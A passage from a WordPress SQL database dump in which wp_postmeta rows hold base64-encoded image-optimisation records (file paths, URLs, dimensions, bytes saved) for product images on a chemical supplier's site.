iLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODE2LCJ0aW1lIjoxNDgzNTg4MTk3LCJpZCI6Mjg5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0ODIsInRpbWUiOjE0ODM1ODgyMDEsImlkIjoyODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjU1NiwidGltZSI6MTQ4MzU4ODIwNCwiaWQiOjI4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTc4LCJ0aW1lIjoxNDgzNTg4MjA4LCJpZCI6Mjg5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MTUsInRpbWUiOjE0ODM1ODgyMTEsImlkIjoyODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjY2NiwidGltZSI6MTQ4MzU4ODIxNSwiaWQiOjI4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6OTIzLCJ0aW1lIjoxNDgzNTg4MjE5LCJpZCI6Mjg5fV0='); 
INSERT INTO `wp_postmeta` VALUES (30265, 264, 'wpfc_optimisation_reduction', '13940'); 
INSERT INTO `wp_postmeta` VALUES (30266, 264, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLmpwZyIsIndpZHRoIjozODg4LCJoZWlnaHQiOjI1OTIsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODgyMjQsImlkIjoiMjY0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY0NiwidGltZSI6MTQ4MzU4ODIyNywiaWQiOjI2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEwMDksInRpbWUiOjE0ODM1ODgyMzEsImlkIjoyNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjo5NjUsInRpbWUiOjE0ODM1ODgyMzUsImlkIjoyNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjMzMTksInRpbWUiOjE0ODM1ODgyNDAsImlkIjoyNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1ODksInRpbWUiOjE0ODM1ODgyNDQsImlkIjoyNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MjgsInRpbWUiOjE0ODM1ODgyNDcsImlkIjoyNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NTksInRpbWUiOjE0ODM1ODgyNTAsImlkIjoyNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4MjgsInRpbWUiOjE0ODM1ODgyNTQsImlkIjoyNjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjYwMiwidGltZSI6MTQ4MzU4ODI1NywiaWQiOjI2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6Njk1LCJ0aW1lIjoxNDgzNTg4MjYxLCJpZCI6MjY0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo5NTMsInRpbWUiOjE0ODM1ODgyNjQsImlkIjoyNjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk1MSwidGltZSI6MTQ4MzU4ODI2OCwiaWQiOjI2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTEyMSwidGltZSI6MTQ4MzU4ODI3MiwiaWQiOjI2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMi02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTE3NSwidGltZSI6MTQ4MzU4ODI3NiwiaWQiOjI2NH1d'); 
INSERT INTO `wp_postmeta` VALUES (30267, 260, 'wpfc_optimisation_reduction', '128392'); 
INSERT INTO `wp_postmeta` VALUES (30268, 260, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDYxOTc3LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDYxOTc3LmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjE5NzgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzcuanBnIiwicmVkdWN0aW9uIjoxMjgzNzgsInRpbWUiOjE0ODM1ODgyODcsImlkIjoiMjYwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgyODksImlkIjoyNjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDYxOTc3LTgwMHg1MjcuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDYxOTc3LTgwMHg1MjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDYxOTc3LTgwMHg1MjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4MjkyLCJpZCI6MjYwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQ2MTk3Ny03Njh4NTA2LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTA2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQ2MTk3Ny03Njh4NTA2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQ2MTk3Ny03Njh4NTA2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODI5NiwiaWQiOjI2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMTYwMHgxMDU1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNTUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDYxOTc3LTE2MDB4MTA1NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMTYwMHgxMDU1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODMwMCwiaWQiOjI2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzMDIsImlkIjoyNjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGR